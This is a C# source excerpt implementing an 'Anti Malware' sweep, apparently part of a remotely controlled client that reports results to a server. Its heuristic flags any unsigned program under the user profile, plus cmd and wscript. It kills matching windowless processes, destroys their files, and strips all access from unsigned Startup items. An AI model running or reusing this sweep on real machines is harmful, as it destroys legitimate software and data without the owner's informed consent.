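/// <summary>
/// Heuristically decides whether the executable at <paramref name="fileloc"/> is to be treated as
/// malicious. The rules are evaluated in order and the first match wins:
/// the path of our own executable is never malicious; a path mentioning "cmd" or "wscript", or lying
/// inside the CLR runtime directory, is malicious; a file with a valid embedded Authenticode
/// signature is not malicious; an unsigned file under the user profile or the common application
/// data folder is malicious; an unsigned file carrying the System or Hidden attribute is malicious;
/// anything else is not.
/// </summary>
/// <param name="fileloc">Full path of the image file to classify.</param>
/// <returns><c>true</c> when a "malicious" rule matched before any "benign" rule.</returns>
/// <exception cref="ArgumentNullException"><paramref name="fileloc"/> is <c>null</c>.</exception>
/// <exception cref="IOException">
/// Propagated from <see cref="File.GetAttributes(string)"/> when the attribute rules are reached and
/// the file cannot be inspected (missing path, access denied).
/// </exception>
/// <remarks>
/// This is a coarse name/location heuristic, not a detection engine: every unsigned program under the
/// user's profile or marked Hidden is classified as malicious (false-positive prone), while anything
/// with a valid signature is trusted unconditionally. All substring tests are case-insensitive because
/// Windows paths are; the original compared case-sensitively and threw when USERPROFILE was unset.
/// </remarks>
public bool IsFileMalicious(string fileloc)
{
    if (fileloc == null)
    {
        throw new ArgumentNullException(nameof(fileloc));
    }

    // Case-insensitive substring test. A null or empty needle never matches: string.Contains(null)
    // would throw, and Contains("") would be true for every path and short-circuit the later rules.
    bool PathMentions(string needle)
    {
        return !string.IsNullOrEmpty(needle)
            && fileloc.IndexOf(needle, StringComparison.OrdinalIgnoreCase) >= 0;
    }

    // Never classify our own process image as malicious.
    if (PathMentions(Application.ExecutablePath))
    {
        return false;
    }

    // Shells/script hosts and anything inside the CLR runtime directory are flagged before the
    // signature check, so even a signed cmd.exe / wscript.exe is treated as malicious.
    if (PathMentions("cmd")
        || PathMentions("wscript")
        || PathMentions(System.Runtime.InteropServices.RuntimeEnvironment.GetRuntimeDirectory()))
    {
        return true;
    }

    // A valid embedded Authenticode signature is taken as proof of benign origin.
    if (WinTrust.VerifyEmbeddedSignature(fileloc))
    {
        return false;
    }

    // Unsigned binaries in user-writable locations.
    if (PathMentions(Environment.GetEnvironmentVariable("USERPROFILE"))
        || PathMentions(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData)))
    {
        return true;
    }

    // Unsigned binaries that hide via file attributes. GetAttributes throws if the file cannot be
    // inspected; that exception is left to the caller.
    FileAttributes attributes = File.GetAttributes(fileloc);
    return (attributes & FileAttributes.System) != 0
        || (attributes & FileAttributes.Hidden) != 0;
}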
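/// <summary>
/// Runs one pass of the "Anti Malware" task: kills every windowless process whose image
/// <see cref="IsFileMalicious"/> classifies as malicious and destroys its image file, replaces the
/// ACL of every unsigned file in the user's Startup folder with an empty one, and finally reports the
/// outcome through <c>mwork</c>.
/// </summary>
/// <remarks>
/// Per-item failures are swallowed so that one inaccessible process or file does not abort the sweep;
/// the cost is that nothing is reported for items that could not be inspected. <c>killed</c> is a
/// field and is not reset here, so repeated calls accumulate the count. <c>fileskilled</c> is only
/// read here; presumably <c>DestroyFile</c> maintains it (not visible in this method).
/// </remarks>
public void Start()
{
    mwork.addinfo("[Anti Malware] Execution Parameters:" + excparams);
    mwork.addinfo("[Anti Malware] Successfully started Malware Cleaner...");

    try
    {
        KillMaliciousProcesses();
        LockDownUnsignedStartupItems();
    }
    catch
    {
        // Best effort: the Startup folder may be missing or unreadable, or a single item may
        // reject the ACL change; the summary below is still sent.
    }

    string priority = PriorityForKillCount(killed);
    mwork.Send("ADDLOG|" + mwork.ClientID + "|" + priority + "|" + "Successfully finished Anti Malware Task. Processes killed: " + killed.ToString() + ".");
    mwork.addinfo("[Anti Malware] Processes killed: " + killed.ToString());
    mwork.addinfo("[Anti Malware] Files destroyed: " + fileskilled.ToString());
    mwork.addinfo("[Anti Malware] Successfully finished the Malware Cleaning!");
}

/// <summary>
/// Kills every running process without a visible main window whose image path is classified as
/// malicious, destroys the image file and increments <c>killed</c>. Processes whose main module
/// cannot be read (other users, protected processes, different bitness) are skipped silently, so the
/// sweep only covers what the current account can open.
/// </summary>
private void KillMaliciousProcesses()
{
    Process[] processes;
    try
    {
        processes = Process.GetProcesses();
    }
    catch
    {
        return;
    }

    foreach (Process p in processes)
    {
        using (p)
        {
            try
            {
                // MainModule throws for processes we are not allowed to open; such processes are skipped.
                string path = Path.GetFullPath(p.MainModule.FileName);

                // Only windowless matches are acted on; anything with a visible main window is left alone.
                if (!IsFileMalicious(path) || WindowIsVisible(p.MainWindowTitle))
                {
                    continue;
                }

                try
                {
                    p.Kill();
                    mwork.addlog("[Anti Malware] Killed Process: " + p.ProcessName);
                }
                catch
                {
                    // Kill may fail (access denied, already exited); the image file is still removed.
                }

                DestroyFile(path);
                killed = killed + 1;
            }
            catch
            {
                // Inaccessible or vanished process: skip it.
            }
        }
    }
}

/// <summary>
/// Replaces the DACL of every unsigned file in the current user's Startup folder with an empty,
/// non-inherited one. The file stays on disk but becomes inaccessible. The Startup folder normally
/// holds .lnk shortcuts, which carry no embedded signature, so every shortcut there is affected.
/// </summary>
private void LockDownUnsignedStartupItems()
{
    string[] startupItems = Directory.GetFiles(Environment.GetFolderPath(Environment.SpecialFolder.Startup));
    foreach (string workload in startupItems)
    {
        if (WinTrust.VerifyEmbeddedSignature(workload))
        {
            continue;
        }

        // These are files (Directory.GetFiles), so use the file-typed security objects; the original
        // applied DirectorySecurity through a DirectoryInfo to the same path.
        FileSecurity acl = new FileSecurity();
        // Protected DACL with inherited rules discarded and no rules added: nobody retains access.
        acl.SetAccessRuleProtection(true, false);
        new FileInfo(workload).SetAccessControl(acl);

        // Log wording is historical: the item is made inaccessible, not deleted.
        mwork.addlog("[Anti Malware] Removed Startup Item: " + workload);
    }
}

/// <summary>
/// Maps the number of killed processes to the log priority sent to the server:
/// 0 → Info, 1 → Log, 2–5 → Priority, more than 5 → Risk.
/// </summary>
/// <param name="killedCount">Number of processes killed during this task.</param>
/// <returns>The priority label used in the ADDLOG message.</returns>
/// <remarks>
/// The original chain tested <c>killed &gt; 2</c> before <c>killed &gt; 5</c>, which made "Risk"
/// unreachable, and left <c>killed == 2</c> with an empty priority. Thresholds are now ordered from
/// most to least severe; 2 is assigned "Priority" (assumed intent — confirm).
/// </remarks>
private static string PriorityForKillCount(int killedCount)
{
    if (killedCount > 5)
    {
        return "Risk";
    }
    if (killedCount >= 2)
    {
        return "Priority";
    }
    if (killedCount == 1)
    {
        return "Log";
    }
    return "Info";
}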